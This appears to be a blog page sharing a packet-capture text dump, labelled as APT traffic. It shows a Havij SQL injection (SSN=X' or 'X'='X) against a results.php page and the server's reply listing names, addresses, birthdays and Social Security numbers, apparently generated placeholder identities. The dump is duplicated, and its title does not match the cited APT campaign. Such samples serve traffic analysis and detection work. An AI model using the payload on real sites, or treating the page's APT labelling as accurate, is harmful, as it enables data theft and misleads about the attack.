Rotten Kitten APT/Malware PCAP Download File Traffic Sample

References:

https://www.hybrid-analysis.com/sample/69e48eb82ce7387d65cc1a82c5a6a170dc6121d479736b1dd33358d09c483617/?environmentId=1
http://securitywarrior.ca/index.php/2015/11/09/rocket-kitten-a-campaign-with-9-lives/

2016-04-23 14:02:38.157746 IP 84.11.146.55.1475 > 192.168.1.124.80: Flags [P.], seq 1:405, ack 1, win 258, length 404: HTTP: GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1
E…’.@…)%T..7…|…P.E. }..P…….GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1
Connection: close
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, /;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US, en;q=0.5
Host: www.allsafesec.com
Referer: http://www.allsafesec.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij

2016-04-23 14:02:38.161384 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], ack 391, win 159, length 0
E..(..@.@.yR…|T..7.P.. }…E..P….P……..
2016-04-23 14:02:38.172462 IP 84.11.146.55.137 > 8.8.4.4.137: NBT UDP PACKET(137): REFRESH(8); REQUEST; UNICAST
E..A.......T..7.........LVG..@......... EGEBECEMEFFECACACACACACACACACAAA.. ..... ........….w
2016-04-23 14:02:38.183008 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 1:961, ack 391, win 159, length 960: HTTP: HTTP/1.1 200 OK
E…..@.@.u….|T..7.P.. }…E..P…….HTTP/1.1 200 OK
Date: Sat, 23 Apr 2016 18:02:43 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.16
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

2039
84.11.146.55.1475: Flags [.], seq 3841:4801, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P…F…>

References: https://www.hybrid-analysis.com/sample/69e48eb82ce7387d65cc1a82c5a6a170dc6121d479736b1dd33358d09c483617/?environmentId=1

Rocket Kitten: A campaign with 9 lives

2016-04-23 14:02:38.157746 IP 84.11.146.55.1475 > 192.168.1.124.80: Flags [P.], seq 1:405, ack 1, win 258, length 404: HTTP: GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1 E…’.@…)%T..7…|…P.E. }..P…….GET /results.php?FirstName=&LastName=&Email=&SSN=X%27+or+%27X%27+%3D%27X HTTP/1.1 Connection: close Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-US, en;q=0.5 Host: www.allsafesec.com Referer: http://www.allsafesec.com/ User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij 2016-04-23 14:02:38.161384 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], ack 391, win 159, length 0 E..(..@.@.yR…|T..7.P.. }…E..P….P…….. 2016-04-23 14:02:38.172462 IP 84.11.146.55.137 > 8.8.4.4.137: NBT UDP PACKET(137): REFRESH(8); REQUEST; UNICAST E..`A…….T..7………LVG..@……… EGEBECEMEFFECACACACACACACACACAAA.. ….. ……..`….w 2016-04-23 14:02:38.183008 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 1:961, ack 391, win 159, length 960: HTTP: HTTP/1.1 200 OK E…..@.@.u….|T..7.P.. }…E..P…….HTTP/1.1 200 OK Date: Sat, 23 Apr 2016 18:02:43 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.16 Connection: close Transfer-Encoding: chunked Content-Type: text/html 2039 84.11.146.55.1475: Flags [.], seq 3841:4801, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P…F…>

E-mail	Title	First Name	Last Name	Street Address	City	State	Birthday	Social Security Number
Mr.	Raymundo	Lawrence	2315 Cimmaron Road	Garden Grove	CA	RaymundoRLawrence@jourrapide.com	2/7/1965	610-46-2192
Mr.	Mike	Clifton	4217 Monroe Street	Houston	TX	MikeGClifton@fleckens.hu	1/22/1947	461-14-0824
Mr.	Anton	Cook	1642 Stonepot Road	Oldwick	NJ	AntonCCook@dayrep.com	1/16/1956	144-15-2105
Mr.	Kevin	Heint 2016-04-23 14:02:38.183557 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 961:1921, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P….]..zelman	2461 Still Pastures Drive	Chester	SC	KevinEHeintzelman@rhyta.com	10/30/1982	655-14-8336
Ms.	Violette	Williams	4104 Taylor Street	Harrison	NY	VioletteAWilliams@einrot.com	1/28/1963	131-74-3821
Ms.	Rosa	Richardson	2147 College Street	Atlanta	GA	RosaRRichardson@jourrapide.com	9/25/1964	258-69-7618
Mr.	Donald	Flanery	3189 Valley Street	Camden	NJ	DonaldCFlanery@einrot.com	6/27/1957	148-28-3332
Ms.	Carmella	Godwin	1686 Vine Street	Hickory Hills	IL	CarmellaAGodwin@teleworm.us	3/14/1968	325-92-0303
Mrs.	Lorene	Culbertson	3195 Single Street 84.11.146.55.1475: Flags [.], seq 1921:2881, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P…+ ..d>	Kingston	MA	LoreneWCulbertson@fleckens.hu	10/25/1983	010-70-3813
Mr.	Marcel	Bing	2533 Stoneybrook Road	Cocoa	FL	MarcelMBing@cuvox.de	12/5/1984	767-26-2410
Mr.	Andrew	Kinne	1919 Eden Drive	Richmond	VA	AndrewDKinne@fleckens.hu	1/8/1975	228-04-3976
Mr.	Alex	Hensley	2621 Tree Top Lane	New Tripoli	PA	AlexVHensley@einrot.com	3/2/1956	178-64-8921
Dr.	Marisol	Moore	1351 Elk City Road	Shreveport	LA	MarisolWMoore@gustr.com	12/14/1973	437-57-3234
Ms.	Brenda	Clark	504 Roosevelt Street	San Francisco	CA	BrendaDClark@fleckens.hu	11/16 2016-04-23 14:02:38.183563 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 2881:3841, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }.A.E..P….F../1988	620-68-6663
Mr.	Herschel	Melton	3752 Arbutus Drive	Doral	FL	HerschelMMelton@jourrapide.com	1/4/1952	592-73-6015
Mrs.	Genie	Mills	750 Diane Street	Oxnard	CA	GenieRMills@rhyta.com	3/30/1965	602-86-5292
Ms.	Mildred	Russo	3804 Kennedy Court	Walpole	MA	MildredARusso@gustr.com	5/1/1950	024-82-9132
Ms.	Tasha	Williamson	4716 Single Street	Malden	MA	TashaDWilliamson@fleckens.hu	1/20/1988	025-72-0119
Mrs.	Melonie	Asher	4190 Seth Street	Abilene	TX	MelonieHAsher@gustr.com	8/4/1984	450-35-0282
Mrs.	Sally	Pernell	664 Pearl Street	Sacramento	CA	SallyLPernell@gustr.com	8/4/1949	568-96-4747
Ms.	Cristina	Strock	3368 Havanna Street	Greensboro	NC	CristinaCStrock@fleckens.hu	11/4/1966	246-63-4007
Ms.	Mary	Glenn	4103 Haven Lane	Perry	MI	MaryCGlenn@dayrep.com	5/30/1978	362-40-9856
Mr.	Fred	Murray	659 Brooke Street	Houston	TX	FredCMurray@superrito.com	9/25/1954	635-26-2048
Mrs.	Cindy	Chandler	3631 Star Trek Drive	Port St Joe	FL	CindyCChandler@teleworm.us	2/1/1966	591-84-6502
Mrs.	Angela	Savage	464 Oak Drive	Schenectady	NY	AngelaASavage@sup 2016-04-23 14:02:38.183571 IP 192.168.1.124.80 > 84.11.146.55.1475: Flags [.], seq 4801:5761, ack 391, win 159, length 960: HTTP E…..@.@.u….|T..7.P.. }…E..P…….errito.com	12/5/1989	095-32-6531
Ms.	Maria	Rios	2070 Everette Alley	Ft Lauderdale	FL	MariaERios@fleckens.hu	5/4/1961	263-80-1338
Mr.	Jesse	Terry	1057 Shady Pines Drive	Madisonville	KY	JesseCTerry@dayrep.com	9/23/1976	406-55-8135
Mrs.	Rhea	Brown	3112 Thompson Street	Los Angeles	CA	RheaCBrown@gustr.com	3/18/1968	556-56-2402
Mr.	Kevin	Parsons	3453 Elliott Street	Manchester	NH	KevinJParsons@gustr.com	4/3/1986	002-76-7546
Mr.	Marcos	Dimarco	4032 South Street	Pecos	TX	MarcosCDimarco@teleworm.us	7/27/1960	636-05-4711
Mr. 192.168.1.124.80: Flags [.], ack 5761, win 258, length 0 E..(‘.@…*.T..7…|…P.E.. ~..P…pm.. 2016-04-23 14:05:12.626767 IP 192.168.1.124.80 > 84.11.146.55.1599: Flags [.], ack 3841, win 210, length 0 E..(.k@.@……|T..7.P.?.#<..p..P...|......... 2016-04-23 14:05:12.626768 IP 192.168.1.124.80 > 84.11.146.55.1599: Flags [.], ack 4801, win 225, length 0 E..(.l@.@……|T..7.P.?.#<..p..P...xL........ 2016-04-23 14:05:12.626768 IP 192.168.1.124.80 > 84.11.146.55.1599: Flags [.], ack 5761, win 240, length 0 E..(.m@.@……|T..7.P.?.#<..p.VP...t}........ 2016-04-23 14:05:12.626838 IP 84.11.146.55.1599 > 192.168.1.124.80: Flags [.], seq 5761:6721, ack 1, win 258, length 960: HTTP Leave a Reply Cancel reply You must be logged in to post a comment.